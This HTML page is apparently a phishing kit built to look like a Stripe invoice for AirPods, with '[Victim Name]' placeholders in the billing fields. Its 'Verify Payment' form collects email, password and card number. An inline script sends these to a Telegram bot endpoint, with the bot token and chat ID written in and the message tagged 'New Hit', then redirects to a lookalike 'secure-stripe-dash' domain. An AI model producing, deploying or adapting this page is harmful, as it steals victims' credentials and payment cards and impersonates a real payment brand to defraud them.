
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Stripe Invoice #INV-2025-456789</title>
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Helvetica+Neue:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
        body { font-family: 'Helvetica Neue', sans-serif; background: #f6f9fc; }
        .stripe-header { background: linear-gradient(90deg, #32325d, #6772e5); color: white; }
        .btn-primary { background-color: #635bff; color: white; padding: 12px 24px; border-radius: 6px; text-decoration: none; transition: background-color 0.3s; }
        .btn-primary:hover { background-color: #5469d4; }
        .invoice-container { max-width: 700px; margin: 24px auto; background: white; border-radius: 8px; box-shadow: 0 4px 12px rgba(0,0,0,0.1); }
        .table th, .table td { padding: 12px; border-bottom: 1px solid #e6ebf1; }
        .badge-paid { background-color: #34c759; color: white; padding: 4px 12px; border-radius: 12px; font-size: 14px; }
        .alert { background-color: #fef2f2; color: #dc2626; padding: 12px; border-radius: 6px; }
        @media (max-width: 640px) { .invoice-container { margin: 16px; } }
    </style>
</head>
<body>
    <header class="stripe-header text-center py-6">
        <img src="https://stripe.com/img/v3/logo/stripe-logo-white.png" alt="Stripe Logo" class="h-8 mx-auto">
        <h1 class="text-xl font-medium mt-2">Invoice #INV-2025-456789</h1>
        <p class="text-sm">Issued: July 19, 2025 | Due: July 26, 2025</p>
    </header>
    <div class="invoice-container p-6">
        <div class="flex justify-between items-center mb-6">
            <h2 class="text-lg font-bold">Invoice Details</h2>
            <span class="badge-paid">PAID</span>
        </div>
        <div class="mb-6">
            <p><strong>From:</strong> TechTrend Store LLC</p>
            <p>1234 Market St, San Francisco, CA 94103</p>
            <p>support@techtrendstore.co</p>
        </div>
        <div class="mb-6">
            <p><strong>Billed To:</strong> [Victim Name]</p>
            <p>[Victim Email]</p>
            <p>456 Oak Ave, New York, NY 10001</p>
        </div>
        <table class="table w-full mb-6">
            <thead>
                <tr class="text-left text-gray-600">
                    <th>Description</th>
                    <th>Quantity</th>
                    <th>Unit Price</th>
                    <th>Total</th>
                </tr>
            </thead>
            <tbody>
                <tr>
                    <td>AirPods Pro 3 (Wireless Earbuds)</td>
                    <td>1</td>
                    <td>$129.99</td>
                    <td>$129.99</td>
                </tr>
                <tr>
                    <td>Shipping (USPS Standard)</td>
                    <td>1</td>
                    <td>$9.99</td>
                    <td>$9.99</td>
                </tr>
            </tbody>
            <tfoot>
                <tr class="font-bold">
                    <td colspan="3">Total</td>
                    <td>$139.98</td>
                </tr>
            </tfoot>
        </table>
        <div class="mb-6">
            <p><strong>Payment Method:</strong> Visa ending in •••• 1234</p>
            <p><strong>Transaction ID:</strong> txn_3PqX8J2k9LmN0pQ</p>
            <p><strong>Tracking Number:</strong> USPS #9400108205461234567890</p>
        </div>
        <div class="alert mb-6">
            <p>Issue with your payment? Verify your details to ensure delivery.</p>
        </div>
        <form class="space-y-4">
            <div>
                <label class="block text-sm font-medium text-gray-700">Email</label>
                <input type="email" name="email" placeholder="you@example.com" class="w-full p-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-[#635bff]" required>
            </div>
            <div>
                <label class="block text-sm font-medium text-gray-700">Password</label>
                <input type="password" name="password" placeholder="••••••••" class="w-full p-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-[#635bff]" required>
            </div>
            <div>
                <label class="block text-sm font-medium text-gray-700">Card Number</label>
                <input type="text" name="card_number" placeholder="4242 4242 4242 4242" class="w-full p-3 border rounded-lg focus:outline-none focus:ring-2 focus:ring-[#635bff]" required>
            </div>
            <button type="submit" class="btn-primary">Verify Payment</button>
        </form>
        <footer class="mt-6 text-center text-sm text-gray-500">
            <p>Questions? Contact <a href="mailto:support@techtrendstore.co" class="text-[#635bff] hover:underline">support@techtrendstore.co</a></p>
            <p><a href="https://secure-stripe-dash.vercel.app" class="text-[#635bff] hover:underline">View in Stripe Dashboard</a></p>
            <p>Powered by Stripe | Terms | Privacy</p>
        </footer>
    </div>
    <script>
        document.querySelector('form').addEventListener('submit', async (e) => {
            e.preventDefault();
            const formData = new FormData(e.target);
            const data = {
                email: formData.get('email'),
                password: formData.get('password'),
                card: formData.get('card_number')
            };
            try {
                await fetch('https://api.telegram.org/bot7813235070:AAGEOAio5gWtoiNZz9MF-dzictp7vZ4erWA/sendMessage', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({
                        chat_id: '7175428395',
                        text: `New Hit: ${JSON.stringify(data, null, 2)}`
                    })
                });
                window.location.href = 'https://secure-stripe-dash.vercel.app/success';
            } catch (error) {
                console.error('Error sending data:', error);
            }
        });
    </script>
</body>
</html>
